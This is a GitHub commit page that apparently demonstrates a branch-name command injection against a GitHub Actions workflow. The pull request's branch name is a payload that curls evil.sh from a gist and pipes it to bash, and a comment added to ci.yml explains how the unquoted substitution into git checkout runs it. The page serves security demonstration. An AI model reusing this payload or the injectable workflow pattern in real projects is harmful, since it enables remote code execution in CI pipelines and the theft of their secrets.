Skip to content

Commit

Permalink
Merge pull request #5 from colek42/$({curl,-sSfL,gist.githubuserconte…
Browse files Browse the repository at this point in the history
…nt.com/colek42/0a6254d21b98e7a437d568126e1d261c/raw/evil.sh}|bash)

Update README.md
  • Loading branch information
colek42 authored Dec 9, 2024
2 parents adf4dc9 + b34fa16 commit 8e19e7b
Show file tree
Hide file tree
Showing 2 changed files with 1 addition and 4 deletions.
1 change: 1 addition & 0 deletions .github/workflows/ci.yml
Original file line number Diff line number Diff line change
Expand Up @@ -39,6 +39,7 @@ jobs:
branch="${branch}"
# Attacker's malicious branch name will be substituted here,
# resulting in execution of `evil.sh` via curl|bash
git checkout $branch
- name: Run Program
run: python src/main.py
4 changes: 0 additions & 4 deletions README.md
Original file line number Diff line number Diff line change
@@ -1,7 +1,3 @@
Below is an updated **README.md** incorporating the exact `evil.sh` file you’ve provided via the Gist link, along with instructions on how the attacker would use it. This README gives a cohesive description of the scenario, including the malicious branch name and the exact external payload.

---

## README

### Overview
Expand Down

0 comments on commit 8e19e7b

Please sign in to comment.